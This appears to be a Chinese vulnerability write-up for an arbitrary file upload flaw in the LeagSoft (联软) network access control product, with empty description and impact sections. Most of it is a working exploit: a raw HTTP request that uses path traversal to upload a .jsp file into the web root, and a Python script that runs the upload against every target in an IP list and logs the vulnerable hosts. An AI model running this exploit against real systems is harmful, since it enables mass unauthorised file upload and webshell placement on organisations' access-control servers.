联软准入 任意文件上传漏洞

一、漏洞简介

二、漏洞影响

三、复现过程

  1. POST /uai/download/uploadfileToPath.htm HTTP/1.1
  2. Host: www.0-sec.org:8099
  3. User-Agent: python-requests/2.22.0
  4. Accept-Encoding: gzip, deflate
  5. Accept: */*
  6. Connection: close
  7. Content-Length: 308
  8. Content-Type: multipart/form-data; boundary=ea8ef2c3b016cd152a651d2799ef2c5c
  9. --ea8ef2c3b016cd152a651d2799ef2c5c
  10. Content-Disposition: form-data; name="input_localfile"; filename="111.jsp"
  11. Content-Type: text/plain
  12. aaaaa
  13. --ea8ef2c3b016cd152a651d2799ef2c5c
  14. Content-Disposition: form-data; name="uploadpath";
  15. ../webapps/notifymsg/devreport/
  16. --ea8ef2c3b016cd152a651d2799ef2c5c--

1.png

上传路径:

https://www.0-sec.org/notifymsg/devreport/111.jsp

2.png

poc

poc.py

  1. import requests
  2. def main(line):
  3. proxies = {'http': 'http://localhost:8080'}
  4. # url = 'https://www.0-sec.org/uai/download/uploadfileToPath.htm'
  5. url = line + '/uai/download/uploadfileToPath.htm'
  6. url_2 = line.strip() + '/notifymsg/devreport/{}'
  7. filename = '111.txt'
  8. files = {
  9. 'input_localfile': (filename, open(filename), 'text/plain'),
  10. }
  11. content = {
  12. 'uploadpath': '../webapps/notifymsg/devreport/'
  13. }
  14. res = requests.post(url, files=files, proxies=proxies, data=content, verify=False)
  15. # print(res.text)
  16. res_2 = requests.get(url_2.format(filename), verify=False)
  17. if 'xxx' in res_2.text:
  18. print('ok....')
  19. with open('ok.txt', mode='a') as f:
  20. f.write(url_2.format(filename) + '\n')
  21. print('写入成功...')
  22. if __name__ == '__main__':
  23. with open('ip.txt', mode='r') as f:
  24. for line in f.readlines():
  25. if line == '\n':
  26. pass
  27. main(line)

参考链接

https://blog.csdn.net/m0_48520508/article/details/108790281